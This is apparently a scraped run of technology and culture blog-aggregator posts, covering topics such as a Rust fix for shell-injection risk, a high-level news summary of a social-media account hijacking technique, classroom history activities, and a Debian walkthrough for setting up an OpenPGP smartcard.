grayhints, gregoriotex, gtrlib-largetrees, gzt, halloweenmath, handout, hang, heuristica, hlist, hobby, hvfloat, hyperref, hyperxmp, ifptex, ijsra, japanese-otf-uptex, jlreq, jmlr, jsclasses, jslectureplanner, karnaugh-map, keyfloat, knowledge, komacv, koma-script, kotex-oblivoir, l3, l3build, ladder, langsci, latex, latex2e, latex2man, latex3, latexbug, latexindent, latexmk, latex-mr, leaflet, leipzig, libertine, libertinegc, libertinus, libertinust1math, lion-msc, lni, longdivision, lshort-chinese, ltb2bib, lualatex-math, lualibs, luamesh, luamplib, luaotfload, luapackageloader, luatexja, luatexko, lwarp, make4ht, marginnote, markdown, mathalfa, mathpunctspace, mathtools, mcexam, mcf2graph, media9, minidocument, modular, montserrat, morewrites, mpostinl, mptrees, mucproc, musixtex, mwcls, mweights, nameauth, newpx, newtx, newtxtt, nfssext-cfr, nlctdoc, novel, numspell, nwejm, oberdiek, ocgx2, oplotsymbl, optidef, oscola, overlays, pagecolor, pdflatexpicscale, pdfpages, pdfx, perfectcut, pgfplots, phonenumbers, phonrule, pkuthss, platex, platex-tools, polski, preview, program, proofread, prooftrees, pst-3dplot, pst-barcode, pst-eucl, pst-func, pst-ode, pst-pdf, pst-plot, pstricks, pstricks-add, pst-solides3d, pst-spinner, pst-tools, pst-tree, pst-vehicle, ptex2pdf, ptex-base, ptex-fontmaps, pxbase, pxchfon, pxrubrica, pythonhighlight, quran, ran_toks, reledmac, repere, resphilosophica, revquantum, rputover, rubik, rutitlepage, sansmathfonts, scratch, seealso, sesstime, siunitx, skdoc, songs, spectralsequences, stackengine, stage, sttools, studenthandouts, svg, tcolorbox, tex4ebook, tex4ht, texosquery, texproposal, thaienum, thalie, thesis-ekf, thuthesis, tikz-kalender, tikzmark, tikz-optics, tikz-palattice, tikzpeople, tikzsymbols, titlepic, tl17, tqft, tracklang, tudscr, tugboat-plain, turabian-formatting, txuprcal, typoaid, udesoftec, uhhassignment, ukrainian, ulthese, unamthesis, unfonts-core, unfonts-extra, unicode-math, uplatex, upmethodology, uptex-base, urcls, variablelm, varsfromjobname, visualtikz, xassoccnt, xcharter, xcntperchap, xecjk, xepersian, xetexko, xevlna, xgreek, xsavebox, xsim, ycbook.

LongNowThe Industrial Sublime: Edward Burtynsky Takes the Long View

“Oil Bunkering #1, Niger Delta, Nigeria 2016” / Photograph by Edward Burtynsky

The New Yorker recently profiled photographer, former SALT speaker, and 02016 sponsor of the Conversations at the Interval livestream Edward Burtynsky and his quest to document a changing planet in the anthropocene age.

“What I am interested in is how to describe large-scale human systems that impress themselves upon the land,” Burtynsky told New Yorker staff writer Raffi Khatchadourian as they surveyed the decimated, oil-covered landscapes of Lagos, Nigeria from a helicopter.

“Saw Mills #1, Niger Delta, Nigeria 2016” / Photograph by Edward Burtynsky

For over three decades, Edward Burtynsky has been taking large-format photographs of industrial landscapes which include mining locations around the globe and the building of Three Gorges Dam in China. His work has been noted for beautiful images which are often at odds with their subject’s negative environmental impacts.

Photograph by Benedicte Kurzen / Noor for The New Yorker

“This is the sublime of our time,” said Burtynsky in his 02008 SALT Talk, which included a formal proposal for a permanent art gallery in the chamber that encloses the 10,000-year Clock, as well as the results of his research into methods of capturing images that might have the best chance to survive in the long-term.

“Oil Bunkering #4, Niger Delta, Nigeria 2016” / Photograph by Edward Burtynsky

As the Khatchadourian notes, Burtynsky’s approach has at times attracted controversy:

Over the years, greater skepticism has been voiced about […] Burtynsky’s inclination to depict toxic landscapes in visually arresting terms. A critic responding to “Oil” wondered whether the fusing of beauty with monumentalism, of extreme photographic detachment with extreme ecological damage, could trigger only apathy as a response. [Curator] Paul Roth had a different view: “Maybe these people are a bit immune to the sublime—being terribly anxious while also being attracted to the beauty of an image.”

“Oil Bunkering #2, Niger Delta, Nigeria 2016” / Photograph by Edward Burtynsky

Burtynsky does not seek to be heavy-handed or pedantic in his work, but neither does he seek to be amoral. The environmental and human rights issues are directly shown, rather than explicitly proclaimed.

“Oil Bunkering #5, Niger Delta, Nigeria 2016” / Photograph by Edward Burtynsky

In recent years Burtynsky’s work has focused on water, including oil spills around the world, like the ones he was documenting in Lagos, a city he calls a “hyper crucible of globalism.”

As the global consequences of human activity have become unmistakably pressing, Burtynsky has connected his photography more directly with environmentalism. “There has been a discussion for a long time about climate change, but we don’t seem to be ceasing anything,” he says. “That has begun to bring a sense of urgency to me.”

Burtynsky is currently working on the film Anthropocene, which documents unprecedented human impact on the natural world.

Read The New Yorker profile of Burtynsky in full.

,

Planet DebianJeremy Bicha: GNOME Tweak Tool 3.25.3

Today I released the second development snapshot (3.25.3) of what will be GNOME Tweak Tool 3.26.

I consider the initial User Interface (UI) rework proposed by the GNOME Design Team to be complete now. Every page in Tweak Tool has been updated, either in this snapshot or the previous development snapshot.

The hard part still remains: making the UI look as good as the mockups. Tweak Tool’s backend makes this a bit more complicated than usual for an app like this.

Here are a few visual highlights of this release.

The Typing page has been moved into an Additional Layout Options dialog in the Keyboard & Mouse page. Also, the Compose Key option has been given its own dialog box.

Florian Müllner added content to the Extensions page that is shown if you don’t have any GNOME Shell extensions installed yet.

A hidden feature that GNOME has had for a long time is the ability to move the Application Menu from the GNOME top bar to a button in the app’s title bar. This is easy to enable in Tweak Tool by turning off the Application Menu switch in the Top Bar page. This release improves how well that works, especially for Ubuntu users where the required hidden appmenu window button was probably not pre-configured.

Some of the ComboBoxes have been replaced by ListBoxes. One example is on the Workspaces page where the new design allows for more information about the different options. The ListBoxes are also a lot easier to select than the smaller ComboBoxes were.

For details of these and other changes, see the commit log or the NEWS file.

GNOME Tweak Tool 3.26 will be released alongside GNOME 3.26 in mid-September.

Planet DebianShirish Agarwal: Seizures, Vigo and bi-pedal motion

Dear all, an update is in order. While talking to physiotherapist couple of days before, came to know the correct term to what was I experiencing. I had experienced convulsive ‘seizure‘ , spasms being a part of it. Reading the wikipedia entry and the associated links/entries it seems I am and was very very lucky.

The hospital or any hospital is a very bad bad place. I have seen all horror movies which people say are disturbing but have never been disturbed as much as I was in hospital. I couldn’t help but hear people’s screams and saw so many cases which turned critical. At times it was not easy to remain positive but dunno from where there was a will to live which pushed me and is still pushing me.

One of the things that was painful for a long time were the almost constant stream of injections that were injected in me. It was almost an afterthought that the nurse put a Vigo in me.

Similar to the Vigo injected in me.

While the above medical device is similar, mine had a cross, the needle was much shorter and is injected into the vein. After that all injections are injected into that including common liquid which is salt,water and something commonly given to patients to stabilize first. I am not remembering the name atm.

I also had a urine bag which was attached to my penis in a non-invasive manner. Both my grandfather and grandma used to cry when things went wrong while I didn’t feel any pain but when the urine bag was disattached and attached again, so seems things have improved there.

I was also very conscious of getting bed sores as both my grandpa and grandma had them when in hospital. As I had no strength I had to beg. plead do everything to make sure that every few hours I was turned from one side to other. I also had an air bag which is supposed to alleviate or relief this condition.

Constant physiotherapy every day for a while slowly increased my strength and slowly both the vigo and feeding tube put inside my throat was removed.

I have no remembrance as to when they had put the feeding tube as it was all rubber and felt bad when it came out.

Further physiotherapy helped me crawl till the top of the bed, the bed was around 6 feet in length and and more than enough so I could turn both sides without falling over.

Few days later I found I could also sit up using my legs as a lever and that gave confidence to the doctors to remove the air bed so I could crawl more easily.

Couple of more days later I stood on my feet for the first time and it was like I had lead legs. Each step was painful but the sense and feeling of independence won over whatever pain was there.

I had to endure wet wipes from nurses and ward boys in place of a shower everyday and while they were respectful always it felt humiliating.

The first time I had a bath after 2 weeks or something, every part of my body cried and I felt like a weakling. I had thought I wouldn’t be able to do justice to the physiotherapy session which was soon after but after the session was back to feeling normal.

For a while I was doing the penguin waddle which while painful was also had humor in it. I did think of shooting the penguin waddle but decided against it as I was half-naked most of the time ( the hospital clothes never fit me properly)

Cut to today and I was able to climb up and down the stairs on my own and circled my own block, slowly but was able to do it on my own by myself.

While I always had a sense of wonderment for bi-pedal motion as well as all other means of transport, found much more respect of walking. I live near a fast food eating joint so I see lot of youngsters posing in different ways with their legs to show interest to their mates. And this I know happens both on the conscious and sub-conscious levels. To be able to see and discern that also put a sense of wonder in nature’s creations.

All in all, I’m probabl6y around 40% independent and still 60% interdependent. I know I have to be patient with myself and those around me and explain to others what I’m going through.

For e.g. I still tend to spill things and still can’t touch-type much.

So, the road is long, I can only pray and hope best wishes for anybody who is my condition and do pray that nobody goes through what I went through, especiallly not children.

I am also hoping that things like DxtER and range of non-invasive treatments make their way into India and the developing world at large.

Anybody who is overweight and is either disgusted or doesn’t like the gym route, would recommend doing sessions with a physiotherapist that you can trust. You have to trust that her judgement will push you a bit more and not more that the gains you make are toppled over.

I still get dizziness spells while doing therapy but will to break it as I know dizziness doesn’t help me.

I hope my writings give strength and understanding to either somebody who is going through it, or relatives or/and caregivers so they know the mental status of the person who’s going through it.

Till later and sorry it became so long.

Update – I forgot to share this inspirational story from my city which I shared with a friend days ago. Add to that, she is from my city. What it doesn’t share is that Triund is a magical place. I had visited once with a friend who had elf ears (he had put on elf ears) and it is kind of place which alchemist talks about, a place where imagination does turn wild and there is magic in the air.


Filed under: Miscellenous Tagged: #air bag, #bed sores, #convulsive epileptic seizure, #crawling, #horror, #humiliation, #nakedness, #penguin waddle, #physiotherapy, #planet-debian, #spilling things, #urine bag, #Vigo medical device

Planet DebianVasudev Kamath: Update: - Shell pipelines with subprocess crate and use of Exec::shell function

In my previous post I used Exec::shell function from subprocess crate and passed it string generated by interpolating --author argument. This string was then run by the shell via Exec::shell. After publishing post I got ping on IRC by Jonas Smedegaard and Paul Wise that I should replace Exec::shell, as it might be prone to errors or vulnerabilities of shell injection attack. Indeed they were right, in hurry I did not completely read the function documentation which clearly mentions this fact.

When invoking this function, be careful not to interpolate arguments into the string run by the shell, such as Exec::shell(format!("sort {}", filename)). Such code is prone to errors and, if filename comes from an untrusted source, to shell injection attacks. Instead, use Exec::cmd("sort").arg(filename).

Though I'm not directly taking input from untrusted source, its still possible that the string I got back from git log command might contain some oddly formatted string with characters of different encoding which could possibly break the Exec::shell , as I'm not sanitizing the shell command. When we use Exec::cmd and pass argument using .args chaining, the library takes care of creating safe command line. So I went in and modified the function to use Exec::cmd instead of Exec::shell.

Below is updated function.

fn copyright_fromgit(repo: &str) -> Result<Vec<String>> {
    let tempdir = TempDir::new_in(".", "debcargo")?;
    Exec::cmd("git")
     .args(&["clone", "--bare", repo, tempdir.path().to_str().unwrap()])
     .stdout(subprocess::NullFile)
     .stderr(subprocess::NullFile)
     .popen()?;

    let author_process = {
        Exec::shell(OsStr::new("git log --format=\"%an <%ae>\"")).cwd(tempdir.path()) |
        Exec::shell(OsStr::new("sort -u"))
    }.capture()?;
    let authors = author_process.stdout_str().trim().to_string();
    let authors: Vec<&str> = authors.split('\n').collect();
    let mut notices: Vec<String> = Vec::new();
    for author in &authors {
        let author_string = format!("--author={}", author);
        let first = {
            Exec::cmd("/usr/bin/git")
             .args(&["log", "--format=%ad",
                    "--date=format:%Y",
                    "--reverse",
                    &author_string])
             .cwd(tempdir.path()) | Exec::shell(OsStr::new("head -n1"))
        }.capture()?;

        let latest = {
            Exec::cmd("/usr/bin/git")
             .args(&["log", "--format=%ad", "--date=format:%Y", &author_string])
             .cwd(tempdir.path()) | Exec::shell("head -n1")
        }.capture()?;

        let start = i32::from_str(first.stdout_str().trim())?;
        let end = i32::from_str(latest.stdout_str().trim())?;
        let cnotice = match start.cmp(&end) {
            Ordering::Equal => format!("{}, {}", start, author),
            _ => format!("{}-{}, {}", start, end, author),
        };

        notices.push(cnotice);
    }

    Ok(notices)
}

I still use Exec::shell for generating author list, this is not problematic as I'm not interpolating arguments to create command string.

Sociological ImagesAre Millennials having less sex? Or more? And what’s coming next?

Based on analyses of General Social Survey data, a well-designed and respected source of data about American life, members of the Millennial generation are acquiring about the same number of sexual partners as the Baby Boomers. This data suggests that the big generational leap was between the Boomers and the generation before them, not the Boomers and everyone that came after. And rising behavioral permissiveness definitely didn’t start with the Millennials. Sexually speaking, Millennials look a lot like their parents at the same age and are perhaps even less sexually active then Generation X.

Is it true?

It doesn’t seem like it should be true. In terms of attitudes, American society is much more sexually permissive than it was for Boomers, and Millennials are especially more permissive. Boomers had to personally take America through the sexual revolution at a time when sexual permissiveness was still radical, while Generation X had to contend with a previously unknown fatal sexually transmitted pandemic. In comparison, the Millennials have it so easy. Why aren’t they having sex with more people?

A new study using data from the National Survey of Family Growth (NSFG) (hat tip Paula England) contrasts with previous studies and reports an increase. It finds that nine out of ten Millennial women had non-marital sex by the time they were 25 years old, compared to eight out of ten Baby Boomers. And, among those, Millennials reported two additional total sexual partners (6.5 vs. 4.6).

Nonmarital Sex by Age 25, Paul Hemez

Are Millennials acquiring more sexual partners after all?

I’m not sure. The NSFG report used “early” Millennials (only ones born between 1981 and 1990). In a not-yet-released book, the psychologist Jean Twenge uses another survey — the Youth Risk Behavior Surveillance System — to argue that the next generation (born between 1995 and 2002), which she calls the “iGen,” are even less likely to be sexually active than Millennial. According to her analysis, 37% of 9th graders in 1995 (born in 1981, arguably the first Millennial year) had lost their virginity, compared to 34% in 2005, and 24% in 2015.

Percentage of high school students who have ever had sex, by grade. Youth Risk Behavior Surveillance System, 1991-2015.

iGen, Jean Twenge

If Twenge is right, then we’re seeing a decline in the rate of sexual initiation and possibly partner acquisition that starts somewhere near the transition between Gen X and Millennial, proceeds apace throughout the Millennial years, and is continuing — Twenge argues accelerating — among the iGens. So, if the new NSFG report finds an increase in sexual partners between the Millennials and the Boomers, it might be because they sampled on “early” Millennials, those closer to Gen Xers, on the top side of the decline.

Honestly, I don’t know. It’s interesting though. And it’s curious why the big changes in sexually permissive attitudes haven’t translated into equally sexually permissive behaviors. Or, have actually accompanied a decrease in sexual behavior. It depends a lot on how you chop up the data, too. Generations, after all, all artificial categories. And variables like “nonmarital sex by age 25” are specific and may get us different findings than other measures. Sociological questions have lots of moving parts and it looks as if we’re still figuring this one out.

Lisa Wade, PhD is a professor at Occidental College. She is the author of American Hookup, a book about college sexual culture, and a textbook about gender. You can follow her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Planet DebianHideki Yamane: PoC: use Sphinx for debian-policy

Before party, we did a monthly study meeting and I gave a talk about tiny hack for debian-policy document.

debian-policy was converted from debian-sgml to docbook in 4.0.0, and my proposal is "Go move forward to Sphinx".

Here's sample, and you can also get PoC source from my GitHub repo and check it.

CryptogramNew Technique to Hijack Social Media Accounts

Access Now has documented it being used against a Twitter user, but it also works against other social media accounts:

With the Doubleswitch attack, a hijacker takes control of a victim's account through one of several attack vectors. People who have not enabled an app-based form of multifactor authentication for their accounts are especially vulnerable. For instance, an attacker could trick you into revealing your password through phishing. If you don't have multifactor authentication, you lack a secondary line of defense. Once in control, the hijacker can then send messages and also subtly change your account information, including your username. The original username for your account is now available, allowing the hijacker to register for an account using that original username, while providing different login credentials.

Three news stories.

Worse Than FailureRepresentative Line: Highly Functional

For a brief period of time, say, about 3–4 years ago, if you wanted to sound really smart, you’d bring up “functional programming”. Name-dropping LISP or even better, Haskell during an interview marked you as a cut above the hoi polloi. Even I, surly and too smart for this, fell into the trap of calling JavaScript “LISP with curly braces”, just because it had closures.

Still, functional programming features have percolated through other languages because they work. They’re another tool for the job, and like any tool, when used by the inexpert, someone might lose a finger. Or perhaps someone should lose a finger, if only as a warning to others.

For example, what if you wanted to execute a loop 100 times in JavaScript? You could use a crummy old for loop, but that’s not functional. The functional solution comes from an anonymous submitter:

Array.apply(null, {length: 99}).map(Number.call, Number).forEach(function (element, index) {
// do some more crazy stuff
});

This is actually an amazing abuse of JavaScript’s faculties, and I thought I saw the worst depredations one could visit on JavaScript while working with Angular code. When I first read this line, my initial reaction was, “oh, that’s not so bad.” Then I tried to trace through its logic. Then I realized, no, this is actually really bad. Not just extraneous arrays bad, but full abused of JavaScript bad. Like call Language Protective Services bad. This is easier to explain if you look at it backwards.

forEach applies a function to each element in the array, supplying the element and the index of that element.

Number.call invokes the Number function, used to convert things into numbers (shocking, I know), but it allows you to supply the this against which the function is executed. map takes a callback function, and supplies an array item for the currentValue, the index, and the whole array as parameters. map also allows you to specify what this is, for the callback itself- which they set to be Number- the function they’re calling.

So, remember, map expects a callback in the form f(currentValue, index, array). We’re supplying a function: call(thisValue, numberToConvert). So, the end result of map in this function is that we’re going to emit an array with each element equal to its own index, which makes the forEach look a bit silly.

Finally, at the front, we call Array.apply, which is mostly the same as Array.call, with a difference in how arguments get passed. This allows the developer to deftly avoid writing new Array(99), which would have the same result, but would look offensively object-oriented.

[Advertisement] High availability, Load-balanced or Basic – design your own Universal Package Manager, allow the enterprise to scale as you grow. Download and see for yourself!

Planet DebianMichal Čihař: Call for Weblate translations

Weblate 2.15 is almost ready (I expect no further code changes), so it's really great time to contribute to it's translations! Weblate 2.15 should be released early next week.

As you might expect, Weblate is translated using Weblate, so the contributions should be really easy. In case there is something unclear, you can look into Weblate documentation.

I'd especially like to see improvements in the Italian translation which was one of the first in Weblate beginnings, but hasn't received much love in past years.

Filed under: Debian English SUSE Weblate

,

Planet Linux AustraliaOpenSTEM: HASS Additional Activities

OK, so you’ve got the core work covered for the term and now you have all those reports to write and admin to catch up on. Well, the OpenSTEM™ Understanding Our World® HASS plus Science material has heaps of activities which help students to practise core curricular skills and can keep students occupied. Here are some ideas:

 Aunt Madge’s Suitcase Activity

Aunt Madge

Aunt Madge is a perennial favourite with students of all ages. In this activity, students use clues to follow Aunt Madge around the world trying to return her forgotten suitcase. There’s a wide range of locations to choose from on every continent – both natural and constructed places. This activity can be tailored for group work, or the whole class, and by adjusting the number of locations to be found, the teacher can adjust to the available time, anywhere from 10-15 minutes to a whole lesson. Younger students enjoy matching the pictures of locations and trying to find the countries on the map. Older students can find out further information about the locations on the information sheets. Teachers can even choose a theme for the locations (such as “Ancient History” or “Aboriginal Places”) and see if students can guess what it is.

 Ancient Sailing Ships Activity

Sailing Ships (History + Science)Science

Students in Years 3 to 6 have undertaken the Ancient Sailing Ships activity this term, however, there is a vast scope for additional aspects to this activity. Have students compared the performance of square-rigged versus lateen sails? How about varying the number of masts? Have students raced the vessels against each other? (a water trough and a fan is all that’s needed for some exciting races) Teachers can encourage the students to examine the effects of other changes to ship design, such as adding a keel or any other innovations students can come up with, which can be tested. Perhaps classes or grades can even race their ships against each other.

Trade and Barter Activity

Students in years 5 and 6 in particular enjoy the Trade and Barter activity, which teaches them the basics of Economics without them even realising it! This activity covers so many different aspects of the curriculum, that it is always a good one to revisit, even though it was not in this term’s units. Students enjoy the challenge and will find the activity different each time. It is a particularly good choice for a large chunk of time, or for smaller groups; perhaps a more experienced group can coach other students. The section of the activity which has students developing their own system of writing is one that lends itself to extension and can even be spun off as a separate activity.

Games from the Past

Kids Playing TagKids Playing Tag

Students of all ages enjoy many of the games listed in the resource Games From The Past. Several of these games are best done whilst running around outside, so if that is an option, then choose from the Aboriginal, Chinese or Zulu games. Many of these games can be played by large groups. Older students might like to try recreating some of the rules for some of the games of Ancient Egypt or the Aztecs. If this resource wasn’t part of the resources for your particular unit, it can be downloaded from the OpenSTEM™ site directly.

 

Class Discussions

The b) and c) sections of the Teacher Handbooks contain suggestions for topics of discussion – such as Women Explorers or global citizenship, or ideas for drawings that the students can do. These can also be undertaken as additional activities. Teachers could divide students into groups to research and explore particular aspects of these topics, or stage debates, allowing students to practise persuasive writing skills as well.

OpenSTEM A0 world map: Country Outlines and Ice Age CoastlineAdding events to a timeline, or the class calendar, also good ways to practise core skills.

The OpenSTEM™ Our World map is used as the perfect complement to many of the Understanding Our World® units. This map comes blank and country names are added to the map during activities. The end of term is also a good chance for students to continue adding country names to the map. These can be cut out of the resource World Countries, which supplies the names in a suitable font size. Students can use the resource World Maps to match the country names to their locations.

We hope you find these suggestions useful!

Enjoy the winter holidays – not too long now to a nice, cosy break!

Planet DebianSimon Josefsson: OpenPGP smartcard under GNOME on Debian 9.0 Stretch

I installed Debian 9.0 “Stretch” on my Lenovo X201 laptop today. Installation went smooth, as usual. GnuPG/SSH with an OpenPGP smartcard — I use a YubiKey NEO — does not work out of the box with GNOME though. I wrote about how to fix OpenPGP smartcards under GNOME with Debian 8.0 “Jessie” earlier, and I thought I’d do a similar blog post for Debian 9.0 “Stretch”. The situation is slightly different than before (e.g., GnuPG works better but SSH doesn’t) so there is some progress. May I hope that Debian 10.0 “Buster” gets this right? Pointers to which package in Debian should have a bug report tracking this issue is welcome (or a pointer to an existing bug report).

After first login, I attempt to use gpg --card-status to check if GnuPG can talk to the smartcard.

jas@latte:~$ gpg --card-status
gpg: error getting version from 'scdaemon': No SmartCard daemon
gpg: OpenPGP card not available: No SmartCard daemon
jas@latte:~$ 

This fails because scdaemon is not installed. Isn’t a smartcard common enough so that this should be installed by default on a GNOME Desktop Debian installation? Anyway, install it as follows.

root@latte:~# apt-get install scdaemon

Then try again.

jas@latte:~$ gpg --card-status
gpg: selecting openpgp failed: No such device
gpg: OpenPGP card not available: No such device
jas@latte:~$ 

I believe scdaemon here attempts to use its internal CCID implementation, and I do not know why it does not work. At this point I often recall that want pcscd installed since I work with smartcards in general.

root@latte:~# apt-get install pcscd

Now gpg --card-status works!

jas@latte:~$ gpg --card-status

Reader ...........: Yubico Yubikey NEO CCID 00 00
Application ID ...: D2760001240102000006017403230000
Version ..........: 2.0
Manufacturer .....: Yubico
Serial number ....: 01740323
Name of cardholder: Simon Josefsson
Language prefs ...: sv
Sex ..............: male
URL of public key : https://josefsson.org/54265e8c.txt
Login data .......: jas
Signature PIN ....: not forced
Key attributes ...: rsa2048 rsa2048 rsa2048
Max. PIN lengths .: 127 127 127
PIN retry counter : 3 3 3
Signature counter : 8358
Signature key ....: 9941 5CE1 905D 0E55 A9F8  8026 860B 7FBB 32F8 119D
      created ....: 2014-06-22 19:19:04
Encryption key....: DC9F 9B7D 8831 692A A852  D95B 9535 162A 78EC D86B
      created ....: 2014-06-22 19:19:20
Authentication key: 2E08 856F 4B22 2148 A40A  3E45 AF66 08D7 36BA 8F9B
      created ....: 2014-06-22 19:19:41
General key info..: sub  rsa2048/860B7FBB32F8119D 2014-06-22 Simon Josefsson 
sec#  rsa3744/0664A76954265E8C  created: 2014-06-22  expires: 2017-09-04
ssb>  rsa2048/860B7FBB32F8119D  created: 2014-06-22  expires: 2017-09-04
                                card-no: 0006 01740323
ssb>  rsa2048/9535162A78ECD86B  created: 2014-06-22  expires: 2017-09-04
                                card-no: 0006 01740323
ssb>  rsa2048/AF6608D736BA8F9B  created: 2014-06-22  expires: 2017-09-04
                                card-no: 0006 01740323
jas@latte:~$ 

Using the key will not work though.

jas@latte:~$ echo foo|gpg -a --sign
gpg: no default secret key: No secret key
gpg: signing failed: No secret key
jas@latte:~$ 

This is because the public key and the secret key stub are not available.

jas@latte:~$ gpg --list-keys
jas@latte:~$ gpg --list-secret-keys
jas@latte:~$ 

You need to import the key for this to work. I have some vague memory that gpg --card-status was supposed to do this, but I may be wrong.

jas@latte:~$ gpg --recv-keys 9AA9BDB11BB1B99A21285A330664A76954265E8C
gpg: failed to start the dirmngr '/usr/bin/dirmngr': No such file or directory
gpg: connecting dirmngr at '/run/user/1000/gnupg/S.dirmngr' failed: No such file or directory
gpg: keyserver receive failed: No dirmngr
jas@latte:~$ 

Surprisingly, dirmngr is also not shipped by default so it has to be installed manually.

root@latte:~# apt-get install dirmngr

Below I proceed to trust the clouds to find my key.

jas@latte:~$ gpg --recv-keys 9AA9BDB11BB1B99A21285A330664A76954265E8C
gpg: key 0664A76954265E8C: public key "Simon Josefsson " imported
gpg: no ultimately trusted keys found
gpg: Total number processed: 1
gpg:               imported: 1
jas@latte:~$ 

Now the public key and the secret key stub are available locally.

jas@latte:~$ gpg --list-keys
/home/jas/.gnupg/pubring.kbx
----------------------------
pub   rsa3744 2014-06-22 [SC] [expires: 2017-09-04]
      9AA9BDB11BB1B99A21285A330664A76954265E8C
uid           [ unknown] Simon Josefsson 
uid           [ unknown] Simon Josefsson 
sub   rsa2048 2014-06-22 [S] [expires: 2017-09-04]
sub   rsa2048 2014-06-22 [E] [expires: 2017-09-04]
sub   rsa2048 2014-06-22 [A] [expires: 2017-09-04]

jas@latte:~$ gpg --list-secret-keys
/home/jas/.gnupg/pubring.kbx
----------------------------
sec#  rsa3744 2014-06-22 [SC] [expires: 2017-09-04]
      9AA9BDB11BB1B99A21285A330664A76954265E8C
uid           [ unknown] Simon Josefsson 
uid           [ unknown] Simon Josefsson 
ssb>  rsa2048 2014-06-22 [S] [expires: 2017-09-04]
ssb>  rsa2048 2014-06-22 [E] [expires: 2017-09-04]
ssb>  rsa2048 2014-06-22 [A] [expires: 2017-09-04]

jas@latte:~$ 

I am now able to sign data with the smartcard, yay!

jas@latte:~$ echo foo|gpg -a --sign
-----BEGIN PGP MESSAGE-----

owGbwMvMwMHYxl2/2+iH4FzG01xJDJFu3+XT8vO5OhmNWRgYORhkxRRZZjrGPJwQ
yxe68keDGkwxKxNIJQMXpwBMRJGd/a98NMPJQt6jaoyO9yUVlmS7s7qm+Kjwr53G
uq9wQ+z+/kOdk9w4Q39+SMvc+mEV72kuH9WaW9bVqj80jN77hUbfTn5mffu2/aVL
h/IneTfaOQaukHij/P8A0//Phg/maWbONUjjySrl+a3tP8ll6/oeCd8g/aeTlH79
i0naanjW4bjv9wnvGuN+LPHLmhUc2zvZdyK3xttN/roHvsdX3f53yTAxeInvXZmd
x7W0/hVPX33Y4nT877T/ak4L057IBSavaPVcf4yhglVI8XuGgaTP666Wuslbliy4
5W5eLasbd33Xd/W0hTINznuz0kJ4r1bLHZW9fvjLduMPq5rS2co9tvW8nX9rhZ/D
zycu/QA=
=I8rt
-----END PGP MESSAGE-----
jas@latte:~$ 

Encrypting to myself will not work smoothly though.

jas@latte:~$ echo foo|gpg -a --encrypt -r simon@josefsson.org
gpg: 9535162A78ECD86B: There is no assurance this key belongs to the named user
sub  rsa2048/9535162A78ECD86B 2014-06-22 Simon Josefsson 
 Primary key fingerprint: 9AA9 BDB1 1BB1 B99A 2128  5A33 0664 A769 5426 5E8C
      Subkey fingerprint: DC9F 9B7D 8831 692A A852  D95B 9535 162A 78EC D86B

It is NOT certain that the key belongs to the person named
in the user ID.  If you *really* know what you are doing,
you may answer the next question with yes.

Use this key anyway? (y/N) 
gpg: signal Interrupt caught ... exiting

jas@latte:~$ 

The reason is that the newly imported key has unknown trust settings. I update the trust settings on my key to fix this, and encrypting now works without a prompt.

jas@latte:~$ gpg --edit-key 9AA9BDB11BB1B99A21285A330664A76954265E8C
gpg (GnuPG) 2.1.18; Copyright (C) 2017 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Secret key is available.

pub  rsa3744/0664A76954265E8C
     created: 2014-06-22  expires: 2017-09-04  usage: SC  
     trust: unknown       validity: unknown
ssb  rsa2048/860B7FBB32F8119D
     created: 2014-06-22  expires: 2017-09-04  usage: S   
     card-no: 0006 01740323
ssb  rsa2048/9535162A78ECD86B
     created: 2014-06-22  expires: 2017-09-04  usage: E   
     card-no: 0006 01740323
ssb  rsa2048/AF6608D736BA8F9B
     created: 2014-06-22  expires: 2017-09-04  usage: A   
     card-no: 0006 01740323
[ unknown] (1). Simon Josefsson 
[ unknown] (2)  Simon Josefsson 

gpg> trust
pub  rsa3744/0664A76954265E8C
     created: 2014-06-22  expires: 2017-09-04  usage: SC  
     trust: unknown       validity: unknown
ssb  rsa2048/860B7FBB32F8119D
     created: 2014-06-22  expires: 2017-09-04  usage: S   
     card-no: 0006 01740323
ssb  rsa2048/9535162A78ECD86B
     created: 2014-06-22  expires: 2017-09-04  usage: E   
     card-no: 0006 01740323
ssb  rsa2048/AF6608D736BA8F9B
     created: 2014-06-22  expires: 2017-09-04  usage: A   
     card-no: 0006 01740323
[ unknown] (1). Simon Josefsson 
[ unknown] (2)  Simon Josefsson 

Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)

  1 = I don't know or won't say
  2 = I do NOT trust
  3 = I trust marginally
  4 = I trust fully
  5 = I trust ultimately
  m = back to the main menu

Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y

pub  rsa3744/0664A76954265E8C
     created: 2014-06-22  expires: 2017-09-04  usage: SC  
     trust: ultimate      validity: unknown
ssb  rsa2048/860B7FBB32F8119D
     created: 2014-06-22  expires: 2017-09-04  usage: S   
     card-no: 0006 01740323
ssb  rsa2048/9535162A78ECD86B
     created: 2014-06-22  expires: 2017-09-04  usage: E   
     card-no: 0006 01740323
ssb  rsa2048/AF6608D736BA8F9B
     created: 2014-06-22  expires: 2017-09-04  usage: A   
     card-no: 0006 01740323
[ unknown] (1). Simon Josefsson 
[ unknown] (2)  Simon Josefsson 
Please note that the shown key validity is not necessarily correct
unless you restart the program.

gpg> quit
jas@latte:~$ echo foo|gpg -a --encrypt -r simon@josefsson.org
-----BEGIN PGP MESSAGE-----

hQEMA5U1Fip47NhrAQgArTvAykj/YRhWVuXb6nzeEigtlvKFSmGHmbNkJgF5+r1/
/hWENR72wsb1L0ROaLIjM3iIwNmyBURMiG+xV8ZE03VNbJdORW+S0fO6Ck4FaIj8
iL2/CXyp1obq1xCeYjdPf2nrz/P2Evu69s1K2/0i9y2KOK+0+u9fEGdAge8Gup6y
PWFDFkNj2YiVa383BqJ+kV51tfquw+T4y5MfVWBoHlhm46GgwjIxXiI+uBa655IM
EgwrONcZTbAWSV4/ShhR9ug9AzGIJgpu9x8k2i+yKcBsgAh/+d8v7joUaPRZlGIr
kim217hpA3/VLIFxTTkkm/BO1KWBlblxvVaL3RZDDNI5AVp0SASswqBqT3W5ew+K
nKdQ6UTMhEFe8xddsLjkI9+AzHfiuDCDxnxNgI1haI6obp9eeouGXUKG
=s6kt
-----END PGP MESSAGE-----
jas@latte:~$ 

So everything is fine, isn’t it? Alas, not quite.

